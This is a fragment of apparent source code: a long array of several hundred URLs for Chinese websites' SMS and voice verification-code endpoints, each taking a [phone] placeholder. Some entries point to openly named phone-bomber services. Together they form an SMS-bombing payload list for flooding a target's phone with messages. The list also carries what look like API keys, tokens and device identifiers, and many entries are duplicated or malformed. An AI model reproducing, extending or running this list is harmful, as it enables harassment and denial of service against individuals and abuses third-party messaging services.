"https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", + "https://john.ixiaolu.com/account/check_account_name?ab_ver=A&account_name=86-[phone]&app_channel=&device=iPhone8%2C1&device_id=5C351103-F887-4932-BC59-58C75875EFDE&login_user_id=0&pcid=ae1895f8187711a6bf727e6d14b0588d&phone_sn=9e633777bc1a27c4cb826b1a4c6309dd34eb80", + "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", + "http://uac.10010.com/oauth2/OpSms?callback=jsonp1557631709566&req_time=&user_id=[phone]&app_code=ECS-2233&msg_type=01", + "http://ttq.api.yolanda.hk/api/v5/users/identifying_code.json?address=&app_id=TTQ&app_revision=2.2.2&cellphone_type=iPhone%206s-12.4&login=[phone]&mob_type=1&platform=iphone&send_type=1&systemLaunguage=zh-Hans-CN", + "http://shxd.jienihua100.com/api/user/getcode?mobile=[phone]&regcode=AC04B8AE-5A73-41D1-8694-3EFD04FEB059", + "http://www.weimaiyy.com/register/sms?t=0.6886729517940704&phone=[phone]", + "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", + "http://z.7qi.me/index.php?call=[phone]&ok=", + "https://qxin.info/oldfile/zha.php?NUMBER=[phone]&c=1&ok=", + "http://www.jiqinging.com/ajax.php?do=getCheckCode&tel=[phone]", + "https://api.daishangqian.com/v3/user/send-sms-code?phone=[phone]", + "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", + "http://account.bababus.com/wap/sendDynamicVerifyCode.htm?mobilePhone=[phone]", + "http://n.youyuan.com/v20/yuan/get_registerMobile_code.html?mobile=[phone]", + "http://passport.centanet.com/m/page/ajax/20C79442F06E.ashx?Act=SetCode+phone=[phone]", + "https://passport.1yyg.com/JPData?action=send2Msg+userMobile=[phone]", + "http://www.100ppi.com/ecp/ppi/get_sf/get_yzm.php?m=[phone]", + "http://www.suicunsuiqu.com/front/account/verifyMobileReg?mobile=[phone]", + "http://www.900index.com/api.php?a=sendsms+m=index+mobile=[phone]", + "http://mall.yyfq.com/installment/fws/user/sendMobileCode?mobile=[phone]", + "http://5.9188.com/activity/activityMobileCheck.go?id=qzkj&mobileno=[phone]", + "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", + "https://www.dfcd168.com/checkAndSendSms.html?mobile=[phone]", + "http://www.taoguba.com.cn/sendCodePC?codeType=ZCYZ+phoneNumber=[phone]", + "http://zntouzi.com/front/account/verifyMobileForReg?randomID=d2b07acd-917c-4d81-a849-9c694f25833b&code=111111&mobile=[phone]", + "http://www.jiqinging.com/ajax.php?do=getCheckCode+tel=[phone]", + "http://www.900index.com/api.php?a=sendsms&m=index&mobile=http://wjy138.haodai26.cn/sms.php?tel=[phone]", + "https://www.sztianjinsuo.com/user/sendPhoneCode?smsType=register&phone=[phone]", + "http://home.ecook.cn/user/code?phone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://api.pintx.cn/User/SendCommonSms?user_tel=[phone]", + "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", + "http://channel.xianjinxia.com/act/light-loan-xjx/registerCodeV3?picCode=0&phone=[phone]", + "http://www.yigongkeji.cc/mobile/weixiu/view/member/getSmsCode?mobile=[phone]", + "http://www.youmw.top/tool/dxhz/?hm=[phone]", + "http://www.ttpai.cn/signup/success?mobile=[phone]", + "http://appsfunc.e-giordano.com/SVC/AppsFunc.svc/rest/CheckUserName?username=[phone]", + "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", + "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://hdh.10086.cn/common/validationIP?phone=[phone]", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "http://passport.lotour.com/reg/sendPhoneCode?callback=jQuery183022448778548277915_1465551896265&mobile=[phone]", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=[phone]", + "http://yangba.syoogame.com/ajax/sendMobileVerifyCode?mobile=[phone]", + "http://www.sxyj.net/WebApi/Phone/SendPhone?phone=[phone]", + "http://www.team520.com/ddos/index.php?hm=[phone]", + "http://www.qmango.com/users/ajax/ajax_register_code.asp?_=1487743660579&mobile=[phone]", + "http://woa.sdo.com/woa/autologin/receiveVerificationSms.shtm?phone=[phone]", + "http://jx.kuwo.cn/KuwoLivePhone/user/sendSMS?mobile=[phone]", + "http://passport.fang.com/loginsendmsm.api?callback=jsonp1475917947591&Service=home-club-web&backurl=&mobilephone=[phone]", + "http://www.gghzj.cc/dx/dx/mini/index.php?hm=[phone]", + "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", + "http://m.cibyun.com/User/SendRegistCCP?MemberUserId=-1&SellerUserId=null&X-Requested-By=m.cibyun.com&X-Requested-Data=qmjiyephkstunetjbbx&phone=[phone]", + "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", + "http://5.9188.com/user/sendSms.go?mobileNo=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://api.yoyo360.cn/rest/authcode/send.json?18286967362=[phone]", + "http://www.zjsgat.gov.cn:8080/was/portals/cxfw/checkusermobile.jsp?mobilephone=[phone]", + "http://dns.shboka.com:22009/F-ZoneService/getValidNumber?phone=[phone]", + "http://user.zhangyoubao.com/passwords/getVerifyCode?mobile=[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "http://www.jc258.cn/signup/send_sms?mobile=[phone]", + "http://svr.cnoa.cn/api/sms.oatry.user.php?jsonpcallback=jsonp1480990856832&task=send&mobile=[phone]", + "http://vipapp.yunjiweidian.com/yunjiapp4buyer/app4buyer/generateSmsCode.json?phone=[phone]", + "http://m.egou.com/validate_phone.htm?phone=[phone]", + "http://www.51zouchuqu.com/sms/send?mobileNo=[phone]", + "http://api.hhyp58.com/basis/sendCheckCode?mobile=[phone]", + "http://www.lawyersuperman.com/checkCellphone?cellphone=[phone]", + "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", + "http://api.beequick.cn/logging/beforeVerifySMS?msisdn=[phone]", + "http://pubacc.mobile.qq.com/mqqweb-pubacc/mqqweb/cgi-bin/lightalk/msgnewsend?phone=[phone]", + "http://home.ecook.cn/user/code?phone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://api.pintx.cn/User/SendCommonSms?user_tel=[phone]", + "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", + "http://channel.xianjinxia.com/act/light-loan-xjx/registerCodeV3?picCode=0&phone=[phone]", + "http://www.yigongkeji.cc/mobile/weixiu/view/member/getSmsCode?mobile=[phone]", + "http://www.youmw.top/tool/dxhz/?hm=[phone]", + "http://www.ttpai.cn/signup/success?mobile=[phone]", + "http://www.jsvideo.tv/sendMsg?phone=[phone]", + "http://u.danongchang.cn/User/CheckUserMess.aspx?type=3&dhhm=[phone]", + "http://appsfunc.e-giordano.com/SVC/AppsFunc.svc/rest/CheckUserName?username=[phone]", + "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", + "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://hdh.10086.cn/common/validationIP?phone=[phone]", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "http://passport.lotour.com/reg/sendPhoneCode?callback=jQuery183022448778548277915_1465551896265&mobile=[phone]", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://www.haoyin.com/message/sendMessage.htm?phone=[phone]", + "http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=[phone]", + "http://47.88.105.195:8080/admin-web/buyers/getVercode.htm?mobile=[phone]", + "http://www.edu-edu.com/cas/web/message/send?phone=[phone]&isNewPhone=true", + "https://api.guanggao.com/user/sendcheckcode?mobile=[phone]&val=&type=0&platform=Android", + "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", + "https://bj.yqbiao.com/UserInfoArea/Users/GetSmsCodeForReg?tel=[phone]", + "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=[phone]&national_code=86&from=1&bkn=1557826707&_=1596758267792", + "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", + "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery17205960549095114636_1596719990361&req_time=1596720031540&mobile=[phone]&unicom_number=0&_=1596720031543", + "https://m.300.cn/verify/message?is_ajax=1&callback=jQuery19109805433584210501_1596669590055&mobile=[phone]&_=1596669590060", + "https://api.rrsjk.com/oauth2/sms/send_vertify_code.do?mobile=[phone]&captcha=&captcha_id=", + "https://api.rrsjk.com/oauth2/sms/send_vertify_code.do?mobile=[phone]&captcha=&captcha_id=", + "http://m.login.httpcn.com/login/LoginCode?callbackparam=jQuery111106766551584217104_1592824186799&val=[phone]&_=1592824186801", + "http://gj.liansuosoft.com/ShopRegister/SendSms?mobile=[phone]", + "https://www.d7w.net/index.php?g=Member&m=Api&a=getmobilecode_binding&j=json&mobile=[phone]", + "https://www.zx123.cn/member/register.php?action=getcode&ajax=1&mobile=[phone]", + "https://sso.agora.io/api/verify/sms?phone=%2B86+131+5822+6398&lang=cn&country=CN&captcha=[phone]", + "http://dopzuul.dd2007.cn/shangji/officeWebInterface/getYzmByMobile.dd?mobile=[phone]&jsoncallback=jsonpCallback_success&_=1599135066051", + "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=4080fdef3cb44298852d226af95b2502&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", + "https://www.tuiyizx.com/v2/cellphone/?m=get&cellphone=%2B86%20[phone]&action=check", + "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", + "http://api.qingmang.me/v1/account.sendVerification?token=&phone=%2B86[phone]&code=70428334", + "http://walk-prod.bohanyuedong.com/api/message/sendV2?phone=[phone]&app_id=2&timestamp=1599549118&channel_id=000&device_id=F9D6949590A78676215E2CD28D7539342F42B1A8&os=25&version=1.0.1&sign=af2b1f5cd686f61176655c7528819b26&imei=861271047037119&imei_device_id=94086F8106D8651CDC5B90160F11B56BD0AECC00", + "http://www.aipai.com/app/www/apps/ums.php?step=ums&mobile=[phone]&callback=jQuery17209171715653229815_1599374652809&_=1599374671117", + "https://www.znds.com/plugin.php?id=tshuz_smslogin:mobile&mod=send&phone=[phone]&type=1&hash=e5038cde", + "https://prod.huohuaschool.com/api-website/user/sms?phone=[phone]&type=6", + "http://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]&_=1592528454449", + "https://www.114yygh.com/web/common/verify-code/get?_time=1592546859053&mobile=[phone]&smsKey=LOGIN", + "http://sa.ec-ego.com:8080/sms/smsCode/getCode?mobilePhone=[phone]&type=register&exp=JMS", + "http://srmemberapp.srgow.com/sys/captcha/://gj.liansuosoft.com/ShopRegister/SendSms?mobile=[phone]", + "https://api-v5-0.yangcong345.com/captchas/v4.8?phone=[phone]&code=CN&type=codeVerify", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "http://juniorapi.gzxiangqi.cn/juniorAccounts/v2/getCode/3/[phone]", + "http://uss.lenovomm.com/accounts/1.4/sendVerifyCode?msisdn=[phone]", + "http://juniorapi.gzxiangqi.cn/juniorAccounts/v2/getCode/3/[phone]", + "", + "https://api.rrsjk.com/oauth2/sms/send_vertify_code.do?mobile=[phone]&captcha=&captcha_id=", + "http://srmemberapp.srgow.com/sys/captcha/[phone]", + "https://card.10010.com/ko-order/messageCaptcha/send?phoneVal=[phone]", + "http://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]&appId=www_home&v=2&sig=&t=1592615855903&v=2", + "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]&msgInterval=60&imageCode=&countryCode=86&country=CN&_=1594952633566", + "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303956739664829656_1592495501835&phone=[phone]&type=5&nation=CN&from_domain=yjs_h5&verifycode=&_=1592495526803", + "https://m.exmail.qq.com/cgi-bin/sell_dependent?action=send_sms&t=wap_official_mgr&ef=jsnew&type=6&area=86&mobile=[phone]&r=0.6184749692742786", + "https://graph.3vjia.com/captcha/mobile/reg/[phone]?moblieImgCaptcha=", + "http://walk-prod.bohanyuedong.com/api/message/sendV2?phone=[phone]&app_id=2&timestamp=1599549118&channel_id=000&device_id=F9D6949590A78676215E2CD28D7539342F42B1A8&os=25&version=1.0.1&sign=af2b1f5cd686f61176655c7528819b26&imei=861271047037119&imei_device_id=94086F8106D8651CDC5B90160F11B56BD0AECC00", + "http://yangba.syoogame.com/ajax/sendMobileVerifyCode?mobile=[phone]", + "http://www.sxyj.net/WebApi/Phone/SendPhone?phone=[phone]", + "http://m.xymens.com/index.php/Home/User/send_code?mobile=[phone]", + "http://e.huijimall.com/api/store/rest/v2/zhutest/request_login_smscode?mobile=[phone]", + "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", + "http://www.ehuu.com/apiv4/clientApicheckPhone?phoneNum=[phone]", + "http://wo10010sh.cn/ticket/?a=[phone]", + "http://cash.herjk.com/herjk-server/user/authcode?mobile=[phone]", + "http://mall.yyfq.com/installment/fws/user/sendMobileCode?mobile=[phone]", + "http://h5.gmccopen.com/act/sso!sendSms.action?mobile=[phone]", + "http://id.ourgame.com/mobilepassport!getMobileYzm.do?passport=[phone]", + "http://www.maizjr.com/register/identifyingcode.json?mobile=[phone]", + "http://13668291681.ftxmall.net/sms/send?mobile=[phone]", + "https://www.limi88.com/get_request_sms_times?phone=[phone]", + "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", + "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", + "http://tools.wx6.org/dianhuahongzhaji/?telcode=[phone]", + "http://u.danongchang.cn/User/CheckUserMess.aspx?type=3&dhhm=[phone]", + "http://118.178.230.82:8081/front/smsLogin.do?sign=2688a8ff469c6a19aeff8c70cfd5444e&platformCode=HUIYING&stime=1483258437244&token=35228404066186&smsType=LOGIN_VERIFY&cell=[phone]", + "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", + "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", + "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "api.php?hm=[phone]", + "http://tools.wx6.org/duanxinhongzhaji/?telcode=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://api.duo17.com/sendsms.do?os_type=android&app_version=2.4.0.0&device_id=860903034476097&pnum=[phone]", + "http://m.yunqiandai.com/mobileCode/sendMobileCodeV/reg?phone=[phone]", + "http://www.happigo.com/shop/index.php?act=login&op=send_auth_code&mobile=[phone]", + "http://www.gghzj.cc/dx/dx/mini/index.php?hm=[phone]", + "http://mkxq.zymk.cn/user/v1/mobilevc/?callback=jQuery321016123103253181426_1503210785449&mobile=[phone]&service=mkn&_=1503210785451 ", + "http://www.atmyjr.com/user/ashx/ajax.ashx?action=telyuyin&mid=17433&v=1439377001052&txtMobile=[phone]", + "http://www.atmyjr.com/user/ashx/ajax.ashxaction=telyuyin&mid=17433&v=1438962406156&txtMobile=[phone]", + "http://www.ezhe.com/api/verifyCode?phone=[phone]&type=2&smsType=1", + "http://www.rrjc.com/sendVoiceCodeByType.do?username=[phone]", + "http://www.line0.com/usercenter/voiceVerificationCodeUserLogin.do?mobile=[phone]", + "http://www.91zcp.com/reg/getVoiceCode?phone=[phone]", + "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", + "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", + "http://www.line0.com/usercenter/voiceVerificationCodeUserLogin.do?mobile=[phone]&voiceType=login", + "https://www5.rayvision.com/yxzCode!send.action?type=2&toPhone=[phone]", + "https://sso.jrj.com.cn/sso/ajaxSendVoice?mobile=[phone]", + "http://www.rrjc.com/sendVoiceCodeByType.do?username=[phone]&regType=1&v_module=toNoviceRegistered", + "http://haojue78.com/WS/WSAccount.asmx/SendMobileMsg?mobile=[phone]", + "https://www.xintongdai.com/customer/login/register/acquirePhoneAgreeItem?phone=[phone]", + "http://www.hotouzi.com/register/register_sms.html?telephone=[phone]&token=", + "http://my.baihe.com/Getinterregist/getPhoneVerifyCode?jsonCallBack=jQuery18306001467584540825_1439706800918&type=2&phone=[phone]&_=1439707017074", + "http://u.panda.tv/ajax_send_sms?_jp=jQuery112408335659883577431_1478711837703&regionId=86&mobile=[phone]", + "http://passport.aplus.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", + "http://zhg.zhuyousoft.com/index.php?s=/Sms/sendSms&phone=[phone]", + "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", + "http://www.chaojitao.cn/index.php?act=login&op=send_reg_sms&f=reg&mobile=[phone]", + "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", + "http://ruzhu.jd.com/user/sendVC?phone=[phone]", + "http://edms.fcbox.com/hibox/weixin/getVerifyCode?mobilePhone=[phone]", + "http://api.zhuangdianbi.com/api/sendSms?phone=[phone]", + "http://www.dingapp.com/sendUserValidCode.action?mobile=[phone]", + "http://www.hcoriental.com/api/v1/user/auth_code/?phone=[phone]", + "http://www.patfun.com/do.php?ac=check_sms&phone=[phone]", + "http://i.pptv.com/2015usercenter/api/sendphonecode/?phoneNum=[phone]", + "https://www.xiongmaojinfu.com//user/index/sendSms?mobile=[phone]", + "http://www.variflight.com/login/reg/sendSms?AE71649A58c77&phone=[phone]", + "http://m.bidcenter.com.cn/JsonHandler/QuickRegisterValidateCode.aspx?mobiles=[phone]", + "http://ws.sythealth.com/wsbyte/fit/v4/sms/validatorcode?form=0&account=[phone]", + "http://m.bidcenter.com.cn/JsonHandler/QuickRegisterValidateCode.aspx?mobiles=[phone]", + "http://user.memeyule.com/authcode/send_mobile?mobile=[phone]", + "http://m.51awifi.com/msv2/sms/send?callback=jQuery111307387434379197657_1489515690497&mobile=[phone]", + "http://ld.liandan100.com/ldmgr/api/user/sendVerifySms?platform=1&versionNum=53&&r=&partnerId=[phone]", + "http://www.jiedianqian.com/api/account/send_verify_code.do?mobile=[phone]", + "http://m.yaya.cn/tools/web_submit.ashx?action=reg_get_mobile_code&mobile=[phone]", + "http://www.zhichiwangluo.com/index.php?r=Login/phoneResetCode&phone=[phone]", + "https://api.daishangqian.com/v2/user/send-sms-code?phone=[phone]", + "http://www.98xianyou.com/passport/sign/code.html?mobile=[phone]", + "http://xq.ibaihe.com/register/captcha?phone=[phone]", + "http://member.ehaier.com/sendMobileSmsVerify.html?mobile=[phone]", + "https://www.jdpay.com/login/register/sendActiveCode.htm?tel=[phone]", + "http://app.bczp.cn/pk/GetCode.ashx?mobile=[phone]", + "http://daogou.zdl123.com/daogou/webService?mobile=[phone]", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]", + "http://www.wsngo.com/reg/sendSmsCheck.html?phone=[phone]", + "http://www.yingegou.cn//api/v2/user/getSmsCode.do?mobile=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://spi.lakala.com/wechat/weixin/signUp/getSMSCode.do?Mobile=[phone]", + "http://tel.kuaishang.cn/cl.php?tel=[phone]", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://api.yinka.co/common/sms?cellphone=[phone]", + "http://wap.10010.com/mobileService/tuiguang/sendMsg.htm?mobileNumber=[phone]", + "http://api.nfapp.southcn.com/nanfang_if/getVerifiCode?phoneNo=[phone]", + "http://www.v5kf.com/member/index/ajax_get_sms_code?mobile=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "https://www.sxcfu.com/user/verifyPhone?phone=[phone]", + "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", + "http://api.66yxq.com:8075/gateway-web/send.htm?mobile=[phone]", + "http://www.loho88.com/activ_check_mobile.php?activ_id=67&activ_type=mis&part_id=body_1_4&goods_id=100&is_new_customers_allow=0&phone=[phone]", + "http://api.jb669.com:9000/jinbang/login/verifyPhone.do?phoneCode=[phone]", + "http://118.178.230.82:8081/front/smsLogin.do?sign=2688a8ff469c6a19aeff8c70cfd5444e&platformCode=HUIYING&stime=1483258437244&token=35228404066186&smsType=LOGIN_VERIFY&cell=[phone]", + "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", + "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", + "http://mobile.rrjc.com/mobile/service.do?operate=2&VersionValue=V2.3.2&vc=29&paramMap.hardwareDpi=1280x720&paramMap.androidBrand=Android&paramMap.hardwareVersion=NoxW&paramMap.systemVersion=4.4.2&type_method=IDX_SENDCODENOLOGIN&appLineNumber=20161123132705&userAppId=f4b7d231-42d5-4220-880a-21223a874c2b&signRrjcMsg=03fb3195732bf4b53cbfe65c342d3980&paramMap.cellphone=[phone]", + "http://db.3z.cc/index.php?tp=front/reg&appid=0&pt=1&ver=2.2.4&imei=352286900745893&sign=c225f84dad88d1c3521fb0ec39e77d5c&op=verify&phone=[phone]", + "http://wx.imlaidian.com/testapi/authCodeGet?callback=jQuery1113009964326163753867_1483628589051&mobile=[phone]", + "http://admin.bongv.com/Home/Modify/sendSmsCode_New.shtml?mp=[phone]", + "http://passport.1yyg.com/JPData?action=send2Msg&userMobile=[phone]", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://w4.duoyi.com/p_user/DoNewActCards.aspx?gate=sw&jsoncallback=jQuery18303232165043277003_1483854401800&act=getsmscode&phone=[phone]", + "http://sms.maogoo.cn/index.php?hm=[phone]", + "http://zha.vvoso.com/?zha=[phone]&x=10", + "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://511xy.pw/?hone=[phone]&s=3&admin=666&", + "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://gd.10086.cn/easy/product/order/getValidateRndCode.jsps?commCode=LLKC300&merchantCode=GD&mobile=[phone]", + "http://511xy.pw/?hone=[phone]&s=1&admin=666", + "http://www.zsbox.net/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", + "http://m.shanzhen.me/sz/index/smsverifyp?phone=[phone]", + "http://home.ecook.cn/user/getVerifyCode?phone=[phone]", + "http://www.v5kf.com/member/index/ajax_get_sms_code?mobile=[phone]", + "http://passport.fang.com/loginsendmsm.api?MobilePhone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "https://www.sxcfu.com/user/verifyPhone?phone=[phone]", + "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", + "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", + "https://uac.10010.com/oauth2/OpSms?callback=jsonp1490030472329&req_time=1490030480322&user_id=[phone]", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "http://user.memeyule.com/authcode/send_mobile?china=true&mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://vis3.renwuto.com/VerifyCode/SendReg?tk=[phone]", + "http://biz.sandnes.cn/msgapi.php?phone=[phone]", + "http://interface.flnet.com/IAccount/GetRegisterSMSCode?cellphone=[phone]", + "http://home.ecook.cn/user/code?phone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://ser.syccy.com/PhoneApi/NewSendMemberCodeForSMS?Phone=[phone]", + "http://www.weloan.com/front/account/verifyMobile?mobile=[phone]", + "http://passport.fanli.com/mobileapi/i/user/mobileFastReg?deviceno=860903034476055&mobile=[phone]", + "http://m.shanzhen.me/sz/index/smsverifyp?phone=[phone]", + "http://www.cmpassport.com/openapi/sendDynaPwd?account=[phone]", + "http://m.fanli.com/invite/sendverifycode?jsoncallback=jsonp2&pos=601&t=1488608297799&mobile=[phone]", + "http://bj1.xiangcloud.com.cn/customer/sms/?phone=[phone] &accessType=1&circleId=100000055", + "http://wifi.gd118114.cn/getPassword.ajax?username=[phone]&os=h5&_srcid=10000386", + "http://www.upshop.cn/Home/User/registerSendCode.html?mobile=[phone]", + "http://www.kl.cc/User/RegSendMobilMail?t=[phone]", + "http://www.xjggjy.com/platform/service/users/register/sendMessage?mobile=[phone]", + "http://www.mgff.com/passport/send_mobile_yzm?mobile=[phone]", + "http://member.med66.com/uc/smscode?phone=[phone]", + "http://passport3.pcgames.com.cn/passport3/api/sendVerificationCode.jsp?mobile=[phone]", + "http://hy.hryouxi.com/HRPF/website/sendSMS.do?phone=[phone]", + "https://www.4008123123.com/phhs_ios/isNotExistUser.action?r=0.9460999953115119?phone=[phone]", + "http://www.hongzhoukan.com/ajax/check_tel_reg.php?mobile=[phone]", + "http://sso1.nlc.cn/sso/currency/sendCodeToMobile?mobile=[phone]", + "http://ptlogin.4399.com/ptlogin/sendRegPhoneCode.do?phone=[phone]", + "http://www.wandafilm.com/login.do?m=sendSms?mobile=[phone]", + "http://www.daquant.com/Member/Index/sendcodes?mobile=[phone]", + "http://www.ind4.net/pc/member/sendRegisterSms.do?phoneNumber=[phone] &_=1502021540432", + "http://www.12chu.com/reg/sendCode.jhtml?mobile=[phone]", + "http://cuckooshop.cn/SMS?phone=[phone]", + "http://www.chatm.com/userInfo/smsCode?mobilephone=[phone]", + "http://www.nswtt.org.cn/commonSms/send.do?mobile= [phone]", + "http://www.4008123123.com/phhs_ios/sendSmsCodeVip.action &accessType=1&circleId=100000055 username=[phone]", + "http://www.jsvideo.tv/sendMsg&type=1 mobile=[phone]", + "http://www.wish3d.com/chitAppValidate.action id=[phone]", + "http://www.12366.com/front/userInfo/sendRegisterMessage loginName=[phone]", + "http://www.qdnks.com/default/user/getvlcode &purpose=register act=get_verify&user_name=[phone]", + "http://app.doowinedu.com/Api/register.php &accountLogin.loginName= accountLogin.mobile=[phone]", + "http://jzplatform.com/distributor/sendcode_do.php e.account=[phone]", + "http://www.wjask.com/wj/req_phone_code&tem=register Mobile=[phone]", + "http://www.eshiptrading.com.cn/api/SMSSafeCode?mobile=[phone]", + "http://www.hzrc.com/ww/b/a/wwba_sendMobileCode.html?phone= [phone]", + "https://login.zbj.com/register/sendRegisterCode?sacc= [phone]", + "http://www.zoneidc.com/user/sendmobi.asp?mobi=[phone]", + "http://passport.ctrl.cn/sms/reg?mobile=[phone]", + "http://www.passpay.net/login/sendVerifyCode?mobile=[phone]", + "http://www.longone.com.cn/servlet/user/Register?&function=AjaxGetPin1&mo= [phone]", + "http://passport.csdn.net/account/mobileregister?action=sendMobileCode&mobile=[phone]", + "http://i.kuwo.cn/US/2014/api/send_sms.jsp?mobile=[phone]", + "http://wap.yunxin123.com/index/getregcode/bid/yunxin?mobile=[phone]", + "http://center.siyi.cn/process.aspx?c=sendvcode&vt=sms&va=reg&mobile=[phone]", + "http://www.023jz.com/register/sendMobileCode.html?mobile=[phone]", + "https://login.10086.cn/chkNumberAction.action?userName=[phone]", + "http://forum.xitek.com/forum.php?mod=ajax&infloat=register&handlekey=register&action=vcode&inajax=1&fp=4155208328&check=80e5&mobile= [phone]", + 